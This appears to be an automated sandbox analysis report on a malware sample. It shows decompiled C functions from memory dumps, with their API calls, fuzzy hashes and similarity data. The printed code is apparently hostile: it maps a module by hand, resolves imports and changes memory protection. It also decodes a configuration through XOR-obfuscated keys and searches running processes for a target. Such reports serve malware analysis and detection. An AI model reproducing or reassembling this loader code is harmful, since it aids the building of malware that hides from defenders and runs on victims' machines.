                  • Instruction ID: f0f15f3a6628242373ed3ff54dfde436d038c5d52d58c0e0912b5b384d28ef2d
                  • Opcode Fuzzy Hash: bb6420d0275edb3c8d6628f144f9ef121b7ae43337e8677f53fc6b5693600e6e
                  • Instruction Fuzzy Hash: 7D01783650411ABFDB12AFA9CC40AFABBF8FB08350F0105A5EA05E7061E7B0E912C790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 37%
                  			E6E0C1FB4(void* __eax, intOrPtr _a4) {
                  
                  				 *0x6e0c4150 =  *0x6e0c4150 & 0x00000000;
                  				_push(0);
                  				_push(0x6e0c414c);
                  				_push(1);
                  				_push(_a4);
                  				 *0x6e0c4148 = 0xc; // executed
                  				L6E0C1B50(); // executed
                  				return __eax;
                  			}




                  APIs
                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E0C1745,00000001,6E0C414C,00000000), ref: 6E0C1FD2
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DescriptorSecurity$ConvertString
                  • String ID:
                  • API String ID: 3907675253-0
                  • Opcode ID: c170b818b4cae5cdde0228552a3ec7534ca92b945d34e85a6d2d66c8bd6c40e2
                  • Instruction ID: cc229dc64e18f0fe6e4c7d00cf4d8152cac2ae39ba4c7e5b384dd90e6e6c73c0
                  • Opcode Fuzzy Hash: c170b818b4cae5cdde0228552a3ec7534ca92b945d34e85a6d2d66c8bd6c40e2
                  • Instruction Fuzzy Hash: 2EC04C75140740BBEA209B808C49F497A617761F05F111504FA99272C093B550598916
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E6E0C1B56(void* __eax) {
                  				char _v8;
                  				void* _v12;
                  				void* __edi;
                  				void* _t18;
                  				long _t24;
                  				long _t26;
                  				long _t29;
                  				intOrPtr _t40;
                  				void* _t41;
                  				intOrPtr* _t42;
                  				void* _t44;
                  
                  				_t41 = __eax;
                  				_t16 =  *0x6e0c4140;
                  				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0c4140 - 0x63698bc4 &  !( *0x6e0c4140 - 0x63698bc4);
                  				_t18 = E6E0C1879( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0c4140 - 0x63698bc4 &  !( *0x6e0c4140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e0c4140 - 0x63698bc4 &  !( *0x6e0c4140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
                  				if(_t18 != 0) {
                  					_t29 = 8;
                  					goto L8;
                  				} else {
                  					_t40 = _v8;
                  					_t29 = E6E0C13B1(_t33, _t40, _t41);
                  					if(_t29 == 0) {
                  						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                  						_t24 = E6E0C160D(_t40, _t44); // executed
                  						_t29 = _t24;
                  						if(_t29 == 0) {
                  							_t26 = E6E0C10AD(_t44, _t40); // executed
                  							_t29 = _t26;
                  							if(_t29 == 0) {
                  								_push(_t26);
                  								_push(1);
                  								_push(_t40);
                  								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                  									_t29 = GetLastError();
                  								}
                  							}
                  						}
                  					}
                  					_t42 = _v12;
                  					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                  					E6E0C105D(_t42);
                  					L8:
                  					return _t29;
                  				}
                  			}















                  APIs
                    • Part of subcall function 6E0C1879: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E0C1B92,?,?,?,?,?,00000002,?,?), ref: 6E0C189D
                    • Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18BF
                    • Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18D5
                    • Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C18EB
                    • Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1901
                    • Part of subcall function 6E0C1879: GetProcAddress.KERNEL32(00000000,?), ref: 6E0C1917
                    • Part of subcall function 6E0C13B1: memcpy.NTDLL(?,?,?), ref: 6E0C13E8
                    • Part of subcall function 6E0C13B1: memcpy.NTDLL(?,?,?), ref: 6E0C141D
                    • Part of subcall function 6E0C160D: LoadLibraryA.KERNELBASE ref: 6E0C1645
                    • Part of subcall function 6E0C10AD: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C10E6
                    • Part of subcall function 6E0C10AD: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0C115B
                    • Part of subcall function 6E0C10AD: GetLastError.KERNEL32 ref: 6E0C1161
                  • GetLastError.KERNEL32(?,?), ref: 6E0C1BD4
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 2673762927-0
                  • Opcode ID: bba85b62123c81a68582727412f40077db187f1b687abc778a8a026ab2452732
                  • Instruction ID: 18fa12ba08dec5d04ca90c0cf7933d7e4a7585a45d73e4958cf42f8125b2ea03
                  • Opcode Fuzzy Hash: bba85b62123c81a68582727412f40077db187f1b687abc778a8a026ab2452732
                  • Instruction Fuzzy Hash: 93112B7A6007056FC710ABE9CC84EDF77BCAF88B187044559EA0197645EBB0E90A8BA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00BB574A(void* __ecx, signed char* _a4) {
                  				void* _v8;
                  				void* _t8;
                  				signed short _t11;
                  				signed int _t12;
                  				signed int _t14;
                  				intOrPtr _t15;
                  				void* _t19;
                  				signed short* _t22;
                  				void* _t24;
                  				intOrPtr* _t27;
                  
                  				_t24 = 0;
                  				_push(0);
                  				_t19 = 1;
                  				_t27 = 0xbbd330;
                  				E00BB91D9();
                  				while(1) {
                  					_t8 = E00BB896F(_a4,  &_v8); // executed
                  					if(_t8 == 0) {
                  						break;
                  					}
                  					_push(_v8);
                  					_t14 = 0xd;
                  					_t15 = E00BB8ECC(_t14);
                  					if(_t15 == 0) {
                  						HeapFree( *0xbbd238, 0, _v8);
                  						break;
                  					} else {
                  						 *_t27 = _t15;
                  						_t27 = _t27 + 4;
                  						_t24 = _t24 + 1;
                  						if(_t24 < 3) {
                  							continue;
                  						} else {
                  						}
                  					}
                  					L7:
                  					_push(1);
                  					E00BB91D9();
                  					if(_t19 != 0) {
                  						_t22 =  *0xbbd338; // 0x3619b70
                  						_t11 =  *_t22 & 0x0000ffff;
                  						if(_t11 < 0x61 || _t11 > 0x7a) {
                  							_t12 = _t11 & 0x0000ffff;
                  						} else {
                  							_t12 = (_t11 & 0x0000ffff) - 0x20;
                  						}
                  						 *_t22 = _t12;
                  					}
                  					return _t19;
                  				}
                  				_t19 = 0;
                  				goto L7;
                  			}














                  APIs
                    • Part of subcall function 00BB91D9: GetProcAddress.KERNEL32(36776F57,00BB5762), ref: 00BB91F4
                    • Part of subcall function 00BB896F: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 00BB899A
                    • Part of subcall function 00BB896F: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00BB89BC
                    • Part of subcall function 00BB896F: memset.NTDLL ref: 00BB89D6
                    • Part of subcall function 00BB896F: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00BB8A14
                    • Part of subcall function 00BB896F: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00BB8A28
                    • Part of subcall function 00BB896F: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00BB8A3F
                    • Part of subcall function 00BB896F: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00BB8A4B
                    • Part of subcall function 00BB896F: lstrcat.KERNEL32(?,642E2A5C), ref: 00BB8A8C
                    • Part of subcall function 00BB896F: FindFirstFileA.KERNELBASE(?,?), ref: 00BB8AA2
                    • Part of subcall function 00BB8ECC: lstrlen.KERNEL32(?,00000000,00BBD330,00000001,00BB577D,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C), ref: 00BB8ED5
                    • Part of subcall function 00BB8ECC: mbstowcs.NTDLL ref: 00BB8EFC
                    • Part of subcall function 00BB8ECC: memset.NTDLL ref: 00BB8F0E
                  • HeapFree.KERNEL32(00000000,00BBD00C,00BBD00C,00BBD00C,00000000,00000005,00000000,00000000,?,?,?,00BB8880,00BB197C,00BBD00C,?,00BB197C), ref: 00BB5799
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                  • String ID:
                  • API String ID: 983081259-0
                  • Opcode ID: 3ded6dfdbd1686a5ba2c9d9a9dd9544fe1fe313455228293c50c3f3043509798
                  • Instruction ID: f1ab69666413f80b5afecd50afa13e1290859ebe40be1d3e4b7c36c0ddb6ef34
                  • Opcode Fuzzy Hash: 3ded6dfdbd1686a5ba2c9d9a9dd9544fe1fe313455228293c50c3f3043509798
                  • Instruction Fuzzy Hash: C801F136700305EFEB20AFE7CC85BFA76D8EB44B60B6000B6B945D6050DEE4DC81A666
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB1CCE(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                  				void* _t21;
                  				void* _t22;
                  				signed int _t24;
                  				intOrPtr* _t26;
                  				void* _t27;
                  
                  				_t26 = __edi;
                  				if(_a4 == 0) {
                  					L2:
                  					_t27 = E00BB386E(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                  					if(_t27 == 0) {
                  						_t24 = _a12 >> 1;
                  						if(_t24 == 0) {
                  							_t27 = 2;
                  							HeapFree( *0xbbd238, 0, _a4);
                  						} else {
                  							_t21 = _a4;
                  							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                  							 *_t26 = _t21;
                  						}
                  					}
                  					L6:
                  					return _t27;
                  				}
                  				_t22 = E00BB9CC9(_a4, _a8, _a12, __edi); // executed
                  				_t27 = _t22;
                  				if(_t27 == 0) {
                  					goto L6;
                  				}
                  				goto L2;
                  			}









                  APIs
                    • Part of subcall function 00BB9CC9: SysFreeString.OLEAUT32(00000000), ref: 00BB9D2C
                  • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,00BB872D,?,004F0053,03619388,00000000,?), ref: 00BB1D31
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Free$HeapString
                  • String ID:
                  • API String ID: 3806048269-0
                  • Opcode ID: 4820f315611c55139cd2089336200805998ca855509444c5620c6a33d4e716eb
                  • Instruction ID: 0ba4a0f51ae02498fc5b11565e663834c1234d6313df414991e883a511448dfa
                  • Opcode Fuzzy Hash: 4820f315611c55139cd2089336200805998ca855509444c5620c6a33d4e716eb
                  • Instruction Fuzzy Hash: C7014F32500519BBCB229F58DC11EFA7FB5EF04790F448964FE049A120D7B1D960DBD0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BB9D43(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                  				void* _t17;
                  
                  				if(_a4 == 0) {
                  					L2:
                  					return E00BBA1A1(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                  				}
                  				_t17 = E00BB1D9E(_a4, _a8, _a12, _a16, _a20); // executed
                  				if(_t17 != 0) {
                  					goto L2;
                  				}
                  				return _t17;
                  			}

                  APIs
                  • lstrlenW.KERNEL32(?,?,?,00BB96B8,3D00BBC0,80000002,00BBA82A,00BB23DB,74666F53,4D4C4B48,00BB23DB,?,3D00BBC0,80000002,00BBA82A,?), ref: 00BB9D68
                    • Part of subcall function 00BB1D9E: SysAllocString.OLEAUT32(00BB23DB), ref: 00BB1DB7
                    • Part of subcall function 00BB1D9E: SysFreeString.OLEAUT32(00000000), ref: 00BB1DF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: String$AllocFreelstrlen
                  • String ID:
                  • API String ID: 3808004451-0
                  • Opcode ID: 83805b8b5251eb14b79841ce667f6c34e14c90d87a9843424d227101083ff0c2
                  • Instruction ID: d0a7473b0e9136c2623bb28919c708f6afda4fe1b386a090f25927bc045fe961
                  • Opcode Fuzzy Hash: 83805b8b5251eb14b79841ce667f6c34e14c90d87a9843424d227101083ff0c2
                  • Instruction Fuzzy Hash: 86F07F3200010EBBDF129F95DC46EEA3FAAEF18391F048065BA1454061D7B2C9B1EBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  APIs
                  • ___crtGetLocaleInfoA.LIBCMT ref: 6E10A90B
                    • Part of subcall function 6E11185F: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E11186B
                    • Part of subcall function 6E11185F: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E111880
                  • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E10A91D
                  • ___crtGetLocaleInfoA.LIBCMT ref: 6E10A93D
                  • ___crtGetLocaleInfoA.LIBCMT ref: 6E10A97F
                  • __calloc_crt.LIBCMT ref: 6E10A952
                    • Part of subcall function 6E10B167: __calloc_impl.LIBCMT ref: 6E10B176
                  • __calloc_crt.LIBCMT ref: 6E10A994
                  • _free.LIBCMT ref: 6E10A9AC
                  • _free.LIBCMT ref: 6E10A9EC
                  • __calloc_crt.LIBCMT ref: 6E10AA16
                  • _free.LIBCMT ref: 6E10AA3C
                  • __invoke_watson.LIBCMT ref: 6E10AA8C
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
                  • String ID:
                  • API String ID: 1731282729-0
                  • Opcode ID: d59e9945ae76d58965d698d2fba2552028bb78076c10559119eb551c563c9af3
                  • Instruction ID: 51cae7c0d1636e89e716d6ee9466b69b4b055271640f95c6bc85a92fa07bd417
                  • Opcode Fuzzy Hash: d59e9945ae76d58965d698d2fba2552028bb78076c10559119eb551c563c9af3
                  • Instruction Fuzzy Hash: 5851BF71A1421AAFEB60CFA58D41FDABBBDEF14314F6084A5F80992141EF318DD4AB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 92%
                  			E00BB62D8(int* __ecx) {
                  				int _v8;
                  				void* _v12;
                  				void* __esi;
                  				signed int _t20;
                  				signed int _t25;
                  				char* _t31;
                  				char* _t32;
                  				char* _t33;
                  				char* _t34;
                  				char* _t35;
                  				void* _t36;
                  				void* _t37;
                  				void* _t38;
                  				intOrPtr _t39;
                  				void* _t41;
                  				intOrPtr _t42;
                  				intOrPtr _t43;
                  				signed int _t46;
                  				intOrPtr _t49;
                  				signed int _t50;
                  				signed int _t55;
                  				void* _t57;
                  				void* _t58;
                  				signed int _t60;
                  				signed int _t64;
                  				signed int _t68;
                  				signed int _t72;
                  				signed int _t76;
                  				signed int _t80;
                  				void* _t85;
                  				intOrPtr _t102;
                  
                  				_t86 = __ecx;
                  				_t20 =  *0xbbd2a0; // 0x63699bc3
                  				if(E00BB5171( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                  					 *0xbbd2d4 = _v12;
                  				}
                  				_t25 =  *0xbbd2a0; // 0x63699bc3
                  				if(E00BB5171( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                  					_push(2);
                  					_pop(0);
                  					goto L60;
                  				} else {
                  					_t85 = _v12;
                  					if(_t85 == 0) {
                  						_t31 = 0;
                  					} else {
                  						_t80 =  *0xbbd2a0; // 0x63699bc3
                  						_t31 = E00BB5322(_t86, _t85, _t80 ^ 0x724e87bc);
                  					}
                  					if(_t31 != 0) {
                  						_t86 =  &_v8;
                  						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                  							 *0xbbd240 = _v8;
                  						}
                  					}
                  					if(_t85 == 0) {
                  						_t32 = 0;
                  					} else {
                  						_t76 =  *0xbbd2a0; // 0x63699bc3
                  						_t32 = E00BB5322(_t86, _t85, _t76 ^ 0x2b40cc40);
                  					}
                  					if(_t32 != 0) {
                  						_t86 =  &_v8;
                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                  							 *0xbbd244 = _v8;
                  						}
                  					}
                  					if(_t85 == 0) {
                  						_t33 = 0;
                  					} else {
                  						_t72 =  *0xbbd2a0; // 0x63699bc3
                  						_t33 = E00BB5322(_t86, _t85, _t72 ^ 0x3b27c2e6);
                  					}
                  					if(_t33 != 0) {
                  						_t86 =  &_v8;
                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                  							 *0xbbd248 = _v8;
                  						}
                  					}
                  					if(_t85 == 0) {
                  						_t34 = 0;
                  					} else {
                  						_t68 =  *0xbbd2a0; // 0x63699bc3
                  						_t34 = E00BB5322(_t86, _t85, _t68 ^ 0x0602e249);
                  					}
                  					if(_t34 != 0) {
                  						_t86 =  &_v8;
                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                  							 *0xbbd004 = _v8;
                  						}
                  					}
                  					if(_t85 == 0) {
                  						_t35 = 0;
                  					} else {
                  						_t64 =  *0xbbd2a0; // 0x63699bc3
                  						_t35 = E00BB5322(_t86, _t85, _t64 ^ 0x3603764c);
                  					}
                  					if(_t35 != 0) {
                  						_t86 =  &_v8;
                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                  							 *0xbbd02c = _v8;
                  						}
                  					}
                  					if(_t85 == 0) {
                  						_t36 = 0;
                  					} else {
                  						_t60 =  *0xbbd2a0; // 0x63699bc3
                  						_t36 = E00BB5322(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                  					}
                  					if(_t36 != 0) {
                  						_push(_t36);
                  						_t57 = 0x10;
                  						_t58 = E00BB902E(_t57);
                  						if(_t58 != 0) {
                  							_push(_t58);
                  							E00BB98F9();
                  						}
                  					}
                  					if(_t85 == 0) {
                  						_t37 = 0;
                  					} else {
                  						_t55 =  *0xbbd2a0; // 0x63699bc3
                  						_t37 = E00BB5322(_t86, _t85, _t55 ^ 0xb30fc035);
                  					}
                  					if(_t37 != 0 && E00BB902E(0, _t37) != 0) {
                  						_t102 =  *0xbbd32c; // 0x36195b0
                  						E00BB1D3E(_t102 + 4, _t53);
                  					}
                  					if(_t85 == 0) {
                  						_t38 = 0;
                  					} else {
                  						_t50 =  *0xbbd2a0; // 0x63699bc3
                  						_t38 = E00BB5322(_t86, _t85, _t50 ^ 0x372ab5b7);
                  					}
                  					if(_t38 == 0) {
                  						L51:
                  						_t39 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t18 = _t39 + 0xbbe252; // 0x616d692f
                  						 *0xbbd2d0 = _t18;
                  						goto L52;
                  					} else {
                  						_t49 = E00BB902E(0, _t38);
                  						 *0xbbd2d0 = _t49;
                  						if(_t49 != 0) {
                  							L52:
                  							if(_t85 == 0) {
                  								_t41 = 0;
                  							} else {
                  								_t46 =  *0xbbd2a0; // 0x63699bc3
                  								_t41 = E00BB5322(_t86, _t85, _t46 ^ 0xd8dc5cde);
                  							}
                  							if(_t41 == 0) {
                  								_t42 =  *0xbbd2a4; // 0x2a5a5a8
                  								_t19 = _t42 + 0xbbe791; // 0x6976612e
                  								_t43 = _t19;
                  							} else {
                  								_t43 = E00BB902E(0, _t41);
                  							}
                  							 *0xbbd340 = _t43;
                  							HeapFree( *0xbbd238, 0, _t85);
                  							L60:
                  							return 0;
                  						}
                  						goto L51;
                  					}
                  				}
                  			}

                  APIs
                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB635D
                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB638F
                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB63C1
                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB63F3
                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB6425
                  • HeapFree.KERNEL32(00000000,00BB1971,00BB1971,?,63699BC3,00BB1971,?,63699BC3,00000005,00BBD00C,00000008,?,00BB1971), ref: 00BB651C
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: c2f96072e7696e32d622288b51be71a896e91bdf11cb0a6c1eabad66abf80cca
                  • Instruction ID: 3ecaea3339e428e3f8185426a388a395ffa67d4ab44ccdda74e9878b7b0a56bf
                  • Opcode Fuzzy Hash: c2f96072e7696e32d622288b51be71a896e91bdf11cb0a6c1eabad66abf80cca
                  • Instruction Fuzzy Hash: 21617C60A00A44AFC720EBB8DDC99FB77EDEB483407640AA5E502D7215FAFDDD01CA25
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _wcscmp.LIBCMT ref: 6E127724
                  • _wcscmp.LIBCMT ref: 6E127735
                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E127751
                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E12777B
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: InfoLocale_wcscmp
                  • String ID:
                  • API String ID: 1351282208-0
                  • Opcode ID: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
                  • Instruction ID: a5055a90d9e015d4042af51f1c186057ccdf1a39a61fc09a1ac187abf6a24dd8
                  • Opcode Fuzzy Hash: c6341a5dbce270518687af483a9166dba13fd0f6f0700d7424f26c2d8e359106
                  • Instruction Fuzzy Hash: 95019231204516BFDF409EA5ED88FC737ACAF05765B218036F909DA1C4EB61D5C1B780
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E00BB24C7() {
                  				char _v264;
                  				void* _v300;
                  				int _t8;
                  				intOrPtr _t9;
                  				int _t15;
                  				void* _t17;
                  
                  				_t15 = 0;
                  				_t17 = CreateToolhelp32Snapshot(2, 0);
                  				if(_t17 != 0) {
                  					_t8 = Process32First(_t17,  &_v300);
                  					while(_t8 != 0) {
                  						_t9 =  *0xbbd2a4; // 0x2a5a5a8
                  						_t2 = _t9 + 0xbbee54; // 0x73617661
                  						_push( &_v264);
                  						if( *0xbbd0fc() != 0) {
                  							_t15 = 1;
                  						} else {
                  							_t8 = Process32Next(_t17,  &_v300);
                  							continue;
                  						}
                  						L7:
                  						CloseHandle(_t17);
                  						goto L8;
                  					}
                  					goto L7;
                  				}
                  				L8:
                  				return _t15;
                  			}

                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB24D7
                  • Process32First.KERNEL32(00000000,?), ref: 00BB24EA
                  • Process32Next.KERNEL32(00000000,?), ref: 00BB2516
                  • CloseHandle.KERNEL32(00000000), ref: 00BB2525
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 3b812f4cbe050caf8362c3497b5127b5f749b7da610f862ddc0181809638e484
                  • Instruction ID: 3aebcb16622a466015a39899e2dd4cfe56d915c5034050f77201d6fc4910aafe
                  • Opcode Fuzzy Hash: 3b812f4cbe050caf8362c3497b5127b5f749b7da610f862ddc0181809638e484
                  • Instruction Fuzzy Hash: 82F09032200525ABD731B7668C69EFB36ECDFD5710F4101E1FA4AC3045FAE4DA468661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E6E0C1800() {
                  				void* _t1;
                  				unsigned int _t3;
                  				void* _t4;
                  				long _t5;
                  				void* _t6;
                  				intOrPtr _t10;
                  				void* _t14;
                  
                  				_t10 =  *0x6e0c4130;
                  				_t1 = CreateEventA(0, 1, 0, 0);
                  				 *0x6e0c413c = _t1;
                  				if(_t1 == 0) {
                  					return GetLastError();
                  				}
                  				_t3 = GetVersion();
                  				if(_t3 != 5) {
                  					L4:
                  					if(_t14 <= 0) {
                  						_t4 = 0x32;
                  						return _t4;
                  					} else {
                  						goto L5;
                  					}
                  				} else {
                  					if(_t3 >> 8 > 0) {
                  						L5:
                  						 *0x6e0c412c = _t3;
                  						_t5 = GetCurrentProcessId();
                  						 *0x6e0c4128 = _t5;
                  						 *0x6e0c4130 = _t10;
                  						_t6 = OpenProcess(0x10047a, 0, _t5);
                  						 *0x6e0c4124 = _t6;
                  						if(_t6 == 0) {
                  							 *0x6e0c4124 =  *0x6e0c4124 | 0xffffffff;
                  						}
                  						return 0;
                  					} else {
                  						_t14 = _t3 - _t3;
                  						goto L4;
                  					}
                  				}
                  			}

                  APIs
                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E0C1D7A,74B063F0), ref: 6E0C180F
                  • GetVersion.KERNEL32 ref: 6E0C181E
                  • GetCurrentProcessId.KERNEL32 ref: 6E0C183A
                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E0C1853
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Process$CreateCurrentEventOpenVersion
                  • String ID:
                  • API String ID: 845504543-0
                  • Opcode ID: f11e8e66604da46065dcfa963aa3c7da54eb7da95b143a2119ea86c7273e2f5f
